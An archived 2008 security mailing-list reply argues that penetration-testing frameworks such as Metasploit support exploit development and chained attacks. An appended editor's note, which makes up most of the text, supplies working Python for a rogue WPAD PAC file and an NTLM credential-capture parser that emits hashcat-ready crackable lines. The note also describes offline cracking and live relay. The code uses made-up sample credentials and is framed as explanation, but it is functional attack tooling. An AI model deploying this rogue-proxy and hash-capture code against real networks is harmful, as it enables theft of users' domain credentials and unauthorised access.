Re: Pentesting tool - Commercial

From: Trygve Aasheim (trygve@pogostick.net)
Date: Tue Mar 04 2008 - 06:47:42 EST


> If these vulnerability assessment management and network
> penetration-testing tools were so important - how come they don't help
> a person create the next iPhone exploit, the next QuickTime exploit, or
> almost certainly find the next Java JVM or Adobe Reader
> vulnerability?

Who says they don't?
Why can't you use metasploit, canvas or impact to help(!) you?

They are all open source, and you can freely add your own exploits,
payloads, macros or change existing ones.
So the results from your fuzzers can be implemented as modules in
these tools and tested.
The framework can then run the exploits for you continuously while you
test different configurations and versions of the target software.

Also it helps if you are looking at exploiting an infrastructure more
than just running one exploit against one target.
Like HD Moore and Valsmith's talk at Black Hat 2007, where they showed
how to use the output from one module as input to another module - and
then achieve your goals.
(WPAD -> HASH -> login into Windows Domain example)

The same approach is used by malware developers now, and MPack is a
good example.
It's a framework built to carry different types of exploits, payloads
and perform different tasks.

We're also seeing more and more fuzzing tools being implemented directly
into these frameworks, like lorcon in Metasploit and the web attack
modules in Impact.
So then the tools can search for new vulnerabilities rather than just act
on the pre-loaded exploits.

So I don't understand your limited view on these tools...
It's like asking "if this car is so damn good, why can't it drive me to
work...!?".

But that might be the difference here...you wanna exploit your iPhone,
while these tools are made to test the security level of company
infrastructures...
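[Editor's note, added to the archived message: the "WPAD -> HASH -> login" chain above is the kind of module-to-module hand-off the post is talking about. The following Python is an added illustration of the first two steps, not code from the post, from Metasploit, or from the Black Hat 2007 talk. A rogue WPAD server hands out a PAC file pointing browsers at an attacker proxy; when that proxy answers a request with a 401 demanding NTLM, the browser sends an NTLMSSP AUTHENTICATE (Type 3) message in the Authorization header. The code builds a constructed Type 3 message (user "jdoe", domain "CORP", made-up 24-byte responses), parses it the way a capture module must, and emits the record as a NetNTLMv1/v2 line in the format hashcat and John the Ripper accept. The fixed challenge 1122334455667788 is the convention capture servers use so precomputed tables apply; everything else (names, sample bytes, the proxy address) is assumed for the example.]

```python
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001

# Fixed server challenge, so that every captured response can be attacked
# with the same precomputed tables (assumption for this example).
CHALLENGE = bytes.fromhex("1122334455667788")


def wpad_pac(proxy_host, proxy_port):
    """PAC script a rogue WPAD server would serve: every client that trusts it
    sends its web traffic, and on a 401 its NTLM credentials, to the proxy."""
    return ('function FindProxyForURL(url, host) {\n'
            '  return "PROXY %s:%d";\n'
            '}\n' % (proxy_host, proxy_port))


def build_type3(user, domain, workstation, lm_resp, nt_resp,
                flags=NEGOTIATE_UNICODE):
    """Construct an NTLMSSP AUTHENTICATE (Type 3) message the way a client
    sends it. Only used here to fabricate a sample capture for the parser."""
    if flags & NEGOTIATE_UNICODE:
        enc = lambda s: s.encode("utf-16-le")
    else:
        enc = lambda s: s.encode("latin-1")
    # Security buffers in wire order; the last one is the session key (empty).
    fields = [lm_resp, nt_resp, enc(domain), enc(user), enc(workstation), b""]
    header_len = 8 + 4 + 8 * len(fields) + 4          # 64 bytes
    msg = bytearray(NTLMSSP_SIGNATURE + struct.pack("<I", 3))
    payload = bytearray()
    for f in fields:
        # Each buffer descriptor: u16 length, u16 max length, u32 offset.
        msg += struct.pack("<HHI", len(f), len(f), header_len + len(payload))
        payload += f
    msg += struct.pack("<I", flags)
    return bytes(msg + payload)


def ntlm_from_authorization(header_value):
    """Pull the raw NTLMSSP blob out of an 'Authorization: NTLM <b64>' value."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("not an NTLM Authorization header")
    return base64.b64decode(token)


def parse_type3(msg):
    """Parse a Type 3 message into user, domain, workstation and the two
    challenge responses. Offsets in the descriptors are relative to the
    start of the message, so trailing extras (Version, MIC) do no harm."""
    if msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("missing NTLMSSP signature")
    if struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an AUTHENTICATE (Type 3) message")

    def buf(desc_off):
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, desc_off)
        if offset + length > len(msg):
            raise ValueError("security buffer points outside the message")
        return msg[offset:offset + length]

    flags = struct.unpack_from("<I", msg, 60)[0]
    dec = (lambda b: b.decode("utf-16-le")) if flags & NEGOTIATE_UNICODE \
        else (lambda b: b.decode("latin-1"))
    return {
        "lm": buf(12), "nt": buf(20),
        "domain": dec(buf(28)), "user": dec(buf(36)),
        "workstation": dec(buf(44)), "flags": flags,
    }


def to_hashcat_line(rec, challenge):
    """Emit the capture as hashcat/JtR input: NetNTLMv1 (mode 5500) when the
    NT response is 24 bytes, otherwise NetNTLMv2 (mode 5600)."""
    if len(rec["nt"]) == 24:
        return "%s::%s:%s:%s:%s" % (rec["user"], rec["domain"],
                                    rec["lm"].hex(), rec["nt"].hex(),
                                    challenge.hex())
    # v2: first 16 bytes are NTProofStr, the rest is the client blob.
    return "%s::%s:%s:%s:%s" % (rec["user"], rec["domain"], challenge.hex(),
                                rec["nt"][:16].hex(), rec["nt"][16:].hex())


def capture(header_value, challenge=CHALLENGE):
    """What the 'HASH' step hands to the next module: one crackable line."""
    return to_hashcat_line(parse_type3(ntlm_from_authorization(header_value)),
                           challenge)


# Constructed sample capture (not real credentials): deterministic filler
# bytes stand in for the 24-byte LM and NTLMv1 responses.
SAMPLE_LM = bytes(range(0x30, 0x48))
SAMPLE_NT = bytes(range(0x10, 0x28))
SAMPLE_AUTH_HEADER = "NTLM " + base64.b64encode(
    build_type3("jdoe", "CORP", "WS01", SAMPLE_LM, SAMPLE_NT)).decode()

if __name__ == "__main__":
    print(wpad_pac("10.0.0.5", 8080))
    print(capture(SAMPLE_AUTH_HEADER))
```

Note the caveat that makes the third step ("login") non-trivial: what comes out of the capture is a challenge-response, not the NT hash, so it cannot simply be replayed as a pass-the-hash credential. It has to be cracked offline (which the fixed challenge makes cheap for NTLMv1), or the authentication has to be relayed live to the target while the client is still connected, which is the relay approach rather than a reuse of the stored line.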




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:26 EDT